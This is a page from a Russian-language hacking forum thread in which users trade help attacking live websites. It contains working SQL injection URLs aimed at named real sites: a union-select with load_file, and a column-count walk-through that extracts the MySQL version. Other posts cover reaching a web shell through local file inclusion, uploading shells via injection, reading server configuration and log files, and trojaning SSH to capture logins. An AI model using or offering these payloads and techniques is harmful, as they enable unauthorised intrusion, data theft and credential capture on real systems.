Старый 23.12.2012, 13:49   #2571
[Bo0oM]
 
Аватар для [Bo0oM]
 
Регистрация: 16.04.2011
Сообщений: 12
Репутация: 1
По умолчанию

Ещё вопрос. Есть скуля, бд сайта на другом серваке. Что с этим можно сделать?)
n i c _ ru/en/cgi/ our_partners.cgi?foreign=Search&country=AM'+UnioN+ sEleCt+1,2,3,4,5,load_file('/db/mysql/'),7--+
__________________
Noob & slowpoke

Последний раз редактировалось [Bo0oM]; 23.12.2012 в 15:47..
[Bo0oM] вне форума   Ответить с цитированием
Старый 23.12.2012, 14:26   #2572
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

Цитата:
Сообщение от Flakt Посмотреть сообщение
Как тут версию вывести?

_http://www.vseslova.ru/index.php?word=oblom&dictionary=ushakov'
the injection point is here-
Код:
SELECT * FROM page $injection WHERE columns=value
so we just have to add a where clause,and the injection goes normally.
Код:
http://www.vseslova.ru/index.php?word=oblom&dictionary=ushakov where 1=1 group by 6
error
Код:
http://www.vseslova.ru/index.php?word=oblom&dictionary=ushakov where 1=1 group by 5
no error,5 columns-
Код:
http://www.vseslova.ru/index.php?word=oblom&dictionary=ushakov where 1=1 and 0 union select 1,2,3,version(),5-- -
5.1.58-log
spari вне форума   Ответить с цитированием
Старый 23.12.2012, 16:33   #2573
30k
 
Регистрация: 23.12.2012
Сообщений: 1
Репутация: 0
По умолчанию

С помощью сканера (Acunetix) нашла уязвимость HTTP Verb Tampering. Гуглила, нашла только презентацию, из которой ничего не поняла, да и немного инфы на английском, из которой поняла то, что нужно использовать не метод Get. Пробовала head, возвращает пустую страничку. Собственно, прошу объяснить, что нужно сделать.
30k вне форума   Ответить с цитированием
Старый 23.12.2012, 19:30   #2574
artrix
 
Регистрация: 13.12.2012
Сообщений: 16
Репутация: -1
По умолчанию

Добрый вечер. Вопрос по lfi. Нашел на сайте lfi через куки, так же залил изображение (в комментарий вписал минишел)
Как к нему обратится? Пробую zln=../../../../../../../../home/zolotoj/server/_files/a1/d4/00/c0/4a/a1d400c04a930f1733d6dfa272c5ad93_0.gif%00&cmd=phpi nfo();; NLOG=4ac9542a355b34fb9eb00566e5a78abe; PID=1 открывается просто изображение.
artrix вне форума   Ответить с цитированием
Старый 23.12.2012, 20:56   #2575
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

http://php.net/manual/ru/function.urlencode.php
Pashkela вне форума   Ответить с цитированием
Старый 23.12.2012, 21:42   #2576
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

пытаюсь залить через инъекцию шелл, но путь неизвестен. ОС Apache/Debian пробовал загрузить конфиги, логи (не нашел) пока безрезультатно. Что можете посоветовать?

Последний раз редактировалось aspi; 23.12.2012 в 21:45..
aspi вне форума   Ответить с цитированием
Старый 23.12.2012, 23:41   #2577
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от aspi Посмотреть сообщение
пытаюсь залить через инъекцию шелл, но путь неизвестен. ОС Apache/Debian пробовал загрузить конфиги, логи (не нашел) пока безрезультатно. Что можете посоветовать?
Вы можете читать /etc/mtab и т.п.? Я думаю имеет смысл определить тип сервера, если он не передаётся в заголовках - посылками заведомо неправильных запросов. Так-же можете попробовать прочитать @@slow_query_log_file, @@general_log_file, в них может быть полезная информация.
NameSpace вне форума   Ответить с цитированием
Старый 24.12.2012, 05:08   #2578
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

http://***/index.php?act=dfdhgfxghhgh&f=14)+UNION+SELECT+(SEL ECT+4+UNION+SELECT+mid(version(),1,1)),2,3,4,5,6,7 ,8,9,10,11,12/*1

MySQL 4.1

Последний раз редактировалось NameSpace; 24.02.2014 в 09:47..
NameSpace вне форума   Ответить с цитированием
Старый 24.12.2012, 10:23   #2579
m0Hze
 
Аватар для m0Hze
 
Регистрация: 05.07.2010
Сообщений: 326
Репутация: 129
По умолчанию

Подскажите по поводу троянинга ssh. Имею рут суидник, хеши из master.passwd конечно же не поддались. Очень уж хочется доступ по ssh получить.
Возможно ли протроянить ssh на сервере, что бы при коннектах мне loginass шло, или ключ, что там возможно.
__________________
multi-vpn.biz - Первый VPN на Эллиптических кривых со скоростью света.
m0Hze вне форума   Ответить с цитированием
Старый 24.12.2012, 11:10   #2580
aspi
 
Аватар для aspi
 
Регистрация: 19.09.2012
Сообщений: 26
Репутация: -4
По умолчанию

-как залить шелл в Serendipity 1.1.2?
aspi вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot